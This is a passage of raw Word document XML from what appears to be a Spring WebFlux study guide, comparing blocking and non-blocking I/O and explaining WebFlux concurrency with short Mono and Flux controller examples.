          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="36A66BCC"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Feature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2982370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I/O</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0385805B"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I/O</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A0015D" w:rsidRPr="00A0015D" w14:paraId="472120E4" w14:textId="77777777" w:rsidTr="0045705D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2D44346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ecution Model</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2C9B7BE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ynchronous (thread blocks until I/O operation completes)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="63EE46D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Asynchronous (thread does not block while waiting for I/O)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A0015D" w:rsidRPr="00A0015D" w14:paraId="0A2635E0" w14:textId="77777777" w:rsidTr="0045705D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5CF7A2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tilization</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="232D290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One thread per request, causing potential thread contention</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="168BBED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Fewer threads handle more requests concurrently</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A0015D" w:rsidRPr="00A0015D" w14:paraId="4A0C713A" w14:textId="77777777" w:rsidTr="0045705D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="76ED831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oughput</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="10CA72A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ower throughput as threads are blocked during I/O operations</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="419D49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Higher throughput due to better resource utilization</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A0015D" w:rsidRPr="00A0015D" w14:paraId="2DDCB30B" w14:textId="77777777" w:rsidTr="0045705D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5A6094E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ility</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="463D9C7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ess scalable, higher resource consumption due to blocking threads</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="44A94C3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More scalable, handles high traffic with fewer resources</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A0015D" w:rsidRPr="00A0015D" w14:paraId="1DCA8599" w14:textId="77777777" w:rsidTr="0045705D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="06CD6C2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Time</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="11BB3F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can be longer due to blocking of threads</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="577E2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is shorter, as threads are free to handle other requests</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A0015D" w:rsidRPr="00A0015D" w14:paraId="24A18E14" w14:textId="77777777" w:rsidTr="0045705D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7D73FE0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deal Use Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="65E5E66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traditional applications with fewer concurrent requests or heavy CPU-bound tasks</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3FC5DC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applications with high concurrency and I/O-bound tasks (e.g., APIs, event-driven apps)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="64D464C3"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Example of Blocking vs Non-blocking I/O in Spring WebFlux:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="432A8254"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Traditional Spring MVC):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50D6A3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553E43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getUser() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50A2C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blocking I/O operation (e.g., querying a database)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD893E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user = userService.getUserFromDatabase(); // Blocks the thread</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02AF3C9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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B3683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8B28C4E"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Spring WebFlux):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54BD7A4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0407FB5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getUser() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4142D9E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non-blocking I/O operation (e.g., asynchronous database query)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CAE58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Async(); // Returns a Mono without blocking the thread</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07924B5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260A398"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Benefits of Non-blocking I/O:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2070BC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lastRenderedPageBreak/>
        <w:t>Scalability</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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ource Efficiency</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: With non-blocking I/O, threads are not idle while waiting for I/O to complete, leading to more efficient use of system resources (CPU and memory).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0143908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mproved Throughput</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: As threads can handle more than one request at a time, the overall throughput of the system improves.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="180D0010"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n to Use Blocking vs Non-blocking:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C817F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Blocking I/O</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> when:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="284B4B63"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have fewer concurrent requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B97D40D"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application is CPU-bound rather than I/O-bound.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AAEF4AE"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using non-reactive libraries or third-party libraries that don't support asynchronous operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64ED77B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Non-blocking I/O</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> when:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0516DD1C"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r application handles many concurrent requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="592D3A09"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dealing with I/O-bound tasks (e.g., reading from databases, files, calling external APIs).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37185452"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need better scalability, such as for real-time applications, microservices, or web APIs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B679A9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10A273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locking I/O</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is more traditional, where a thread waits for I/O operations to complete before moving on.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="433C0E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as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allows threads to be free and handle multiple requests at once, leading to better scalability, performance, and efficiency in I/O-bound applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E728E8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87" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD26DAB" w14:textId="6A33C61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4" w:name="_Toc197867728"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How does Spring WebFlux handle concurrency</w:t>
      </w:r>
      <w:r w:rsidR="00163F3B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="514"/>
    </w:p>
    <w:p w14:paraId="6FA0B914" w14:textId="5A4CEAAF" w:rsidR="00730477" w:rsidRPr="00A0015D" w:rsidRDefault="00730477"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handles </w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>concurrency</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> by using </w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reactive programming principles</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Non-blocking I/O:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24695319"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on the other hand, uses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where threads don't get blocked while waiting for I/O operations to complete. Instead, the thread is freed up to handle other requests, and once the operation completes, the result is pushed to the application in a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manner.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B4DC31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is enables Spring WebFlux to handle a </w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>large number of concurrent requests</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> efficiently using fewer threads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61421D59"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Reactive Streams:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="406CD0E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uses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based on the </w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Reactive Streams API</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>) to handle asynchronous data processing. The main components of reactive streams are:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2997D5A9"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A source of data (such as a database or API).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40EC8BC3"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ubscriber</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A consumer that processes the data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DBA89BC"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rocessor</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A middle component that may transform or filter the data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0842DF9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re the core abstractions in Spring WebFlux that implement the reactive stream's </w:t>
      </w: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xml:space="preserve"> interface:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08888C16"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represents a single asynchronous value or an empty value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7972CE81"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s a sequence of asynchronous values.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="446912A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se abstractions allow Spring WebFlux to manage concurrency effectively by processing the data asynchronously without blocking threads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DFCE716"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3. Event Loop Model:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A39F1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orks on the </w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>event-loop</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> model (typically via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xml:space="preserve"> as the underlying server), which means that a small number of threads (event loops) are responsible for handling many requests concurrently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BFBA2B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model is highly efficient in I/O-bound operations (like making external API calls, database queries) because it does not require one thread per request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F9E5C7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4. Backpressure:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E49D76"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One of the challenges in handling concurrency with asynchronous systems is controlling the flow of data when a subscriber cannot keep up with the publisher's rate of data production. </w:t>
      </w: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is a mechanism that handles this situation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1179800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allows Spring WebFlux to handle large streams of data without overwhelming the system, ensuring that resources are not exhausted, and the application remains responsive.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64FBF6C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5. Thread Management:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31378C5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uses </w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reactor threads</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (when using the default </w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Reactor</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> library) or </w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>event loop threads</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (when using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to handle multiple requests concurrently. This contrasts with traditional thread-per-request models (like in Spring MVC), where a thread is allocated for each request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B106B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By using non-blocking I/O and event loop-based thread models, Spring WebFlux can handle thousands of concurrent requests with a small pool of threads, optimizing resource usage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FEF818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6. Concurrency Model in Spring WebFlux:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22497EA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vent-driven and non-blocking</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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reuse</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: In non-blocking models, a thread can be used to handle multiple requests, which reduces the overhead of creating new threads for each request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6425499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ctive Execution</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Throug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Spring WebFlux allows the application to react to incoming data asynchronously, making it highly efficient in scenarios where many I/O operations are involved.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="058605F3"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7. Concurrency Example with Flux:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="019EDCB3"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Here’s how concurrency is handled when using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to return a stream of data:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="468572F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s")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0897CFC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Flux&lt;User&gt; getUsers() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="430A37F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sFromDatabase();  // returns a Flux of users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A11ED8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CD3068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this example, the thread will not be blocked while waiting for the getUsersFromDatabase() method to retrieve data. Instead, it will return a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ing the asynchronous sequence of users. The data is fetched and streamed to the client once it's available.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66AD330A"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thread handles other incoming requests while the user data is being retrieved in the background.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D8BFEF8"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8. Concurrency in WebFlux with Mono:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC13EFF"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imilarly, when working wit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you can handle single asynchronous results:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="769A7A60"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1F55A87E"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User&gt; getUser(@RequestParam String userId) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="342DA7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userId);  // returns a Mono of a single user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5688DF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BFF2C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is case, the thread handling the request is not blocked while waiting for the result of the getUserFromDatabase() method, making it ready to handle other requests concurrently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67672A3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Spring WebFlux's Concurrency Model:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BCC379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etter Resource Utilization</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: With non-blocking I/O and asynchronous processing, fewer threads are required, leading to better resource utilization and reduced overhead.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="647E202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le</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Since it doesn't require a thread per request, it can handle many more requests concurrently than traditional models.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A47945"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fficient</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: For I/O-bound applications (like querying databases or calling external services), WebFlux performs more efficiently than blocking models by not holding up threads while waiting for I/O operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21CD24A2"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l-time and Reactive Systems</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: It is well-suited for systems requiring real-time processing and low-latency responses, such as chat applications, live data feeds, and event-driven architectures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56032927"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524E8FE3" w14:textId="77777777" w:rsidR="00730477" w:rsidRPr="00CE4B95" w:rsidRDefault="00730477"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Spring WebFlux handles concurrency efficiently by using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reactive programming model</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">,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Flux and Mono), and the </w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>event-loop model</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. This allows Spring WebFlux to handle many requests concurrently with a minimal number of threads, making it highly scalable and suitable for I/O-bound, high-concurrency applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70036AB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88" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EBF9491" w14:textId="7F7524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5" w:name="_Toc197867729"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
